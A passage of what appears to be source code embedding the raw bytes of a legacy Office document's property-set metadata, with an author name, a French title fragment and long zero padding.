+"\x01\x00\x00\x00\x03\x00\x00\x00\xd3\x11\x00\x00\x03\x00\x00\x00" +"\x0c\x62\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00" +"\x09\x00\x00\x00\x50\x61\x74\x72\x69\x63\x69\x61\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xfe\xff\x00\x00\x05\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\xd5\xcd\xd5" +"\x9c\x2e\x1b\x10\x93\x97\x08\x00\x2b\x2c\xf9\xae\x44\x00\x00\x00" +"\x05\xd5\xcd\xd5\x9c\x2e\x1b\x10\x93\x97\x08\x00\x2b\x2c\xf9\xae" +"\x4c\x01\x00\x00\x08\x01\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00" +"\x68\x00\x00\x00\x0f\x00\x00\x00\x70\x00\x00\x00\x05\x00\x00\x00" +"\x80\x00\x00\x00\x06\x00\x00\x00\x88\x00\x00\x00\x11\x00\x00\x00" +"\x90\x00\x00\x00\x17\x00\x00\x00\x98\x00\x00\x00\x0b\x00\x00\x00" +"\xa0\x00\x00\x00\x10\x00\x00\x00\xa8\x00\x00\x00\x13\x00\x00\x00" +"\xb0\x00\x00\x00\x16\x00\x00\x00\xb8\x00\x00\x00\x0d\x00\x00\x00" +"\xc0\x00\x00\x00\x0c\x00\x00\x00\xe9\x00\x00\x00\x02\x00\x00\x00" +"\xe4\x04\x00\x00\x1e\x00\x00\x00\x05\x00\x00\x00\x2a\x2a\x2a\x2a" +"\x00\x00\x45\x00\x03\x00\x00\x00\xd1\x00\x00\x00\x03\x00\x00\x00" +"\x3b\x00\x00\x00\x03\x00\x00\x00\xa4\x73\x00\x00\x03\x00\x00\x00" +"\x41\x0a\x0a\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00" +"\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00" 
+"\x00\x00\x00\x00\x1e\x10\x00\x00\x01\x00\x00\x00\x1d\x00\x00\x00" +"\x4c\x45\x20\x4c\x49\x56\x52\x45\x54\x20\x44\x55\x20\x50\x52\x4f" +"\x50\x52\x49\x45\x54\x41\x49\x52\x45\x20\x44\x45\x00\x0c\x10\x00" +"\x00\x02\x00\x00\x00\x1e\x00\x00\x00\x06\x00\x00\x00\x54\x69\x74" +"\x72\x65\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xd8\x01\x00\x00" +"\x07\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x01\x00\x00\x00" +"\xf4\x00\x00\x00\x00\x00\x00\x80\xfc\x00\x00\x00\x02\x00\x00\x00" +"\x04\x01\x00\x00\x03\x00\x00\x00\x0c\x01\x00\x00\x04\x00\x00\x00" +"\x74\x01\x00\x00\x05\x00\x00\x00\xb0\x01\x00\x00\x04\x00\x00\x00" +"\x02\x00\x00\x00\x14\x00\x00\x00\x5f\x00\x41\x00\x64\x00\x48\x00" +"\x6f\x00\x63\x00\x52\x00\x65\x00\x76\x00\x69\x00\x65\x00\x77\x00" +"\x43\x00\x79\x00\x63\x00\x6c\x00\x65\x00\x49\x00\x44\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xfe\xff\x00\x00\x05\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\xd5\xcd\xd5" +"\x9c\x2e\x1b\x10\x93\x97\x08\x00\x2b\x2c\xf9\xae\x30\x00\x00\x00" +"\x08\x01\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x68\x00\x00\x00" +"\x0f\x00\x00\x00\x70\x00\x00\x00\x05\x00\x00\x00\x80\x00\x00\x00" +"\x06\x00\x00\x00\x88\x00\x00\x00\x11\x00\x00\x00\x90\x00\x00\x00" +"\x17\x00\x00\x00\x98\x00\x00\x00\x0b\x00\x00\x00\xa0\x00\x00\x00" +"\x10\x00\x00\x00\xa8\x00\x00\x00\x13\x00\x00\x00\xb0\x00\x00\x00" +"\x16\x00\x00\x00\xb8\x00\x00\x00\x0d\x00\x00\x00\xc0\x00\x00\x00" +"\x0c\x00\x00\x00\xe9\x00\x00\x00\x02\x00\x00\x00\xe4\x04\x00\x00" +"\x1e\x00\x00\x00\x05\x00\x00\x00\x2a\x2a\x2a\x2a\x00\x00\x45\x00" 
+"\x03\x00\x00\x00\xd1\x00\x00\x00\x03\x00\x00\x00\x3b\x00\x00\x00" +"\x03\x00\x00\x00\xa4\x73\x00\x00\x03\x00\x00\x00\x41\x0a\x0a\x00" +"\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00" +"\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00" +"\x1e\x10\x00\x00\x01\x00\x00\x00\x1d\x00\x00\x00\x4c\x45\x20\x4c" +"\x49\x56\x52\x45\x54\x20\x44\x55\x20\x50\x52\x4f\x50\x52\x49\x45" +"\x54\x41\x49\x52\x45\x20\x44\x45\x00\x0c\x10\x00\x00\x02\x00\x00" +"\x00\x1e\x00\x00\x00\x06\x00\x00\x00\x54\x69\x74\x72\x65\x00\x03" +"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7c\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 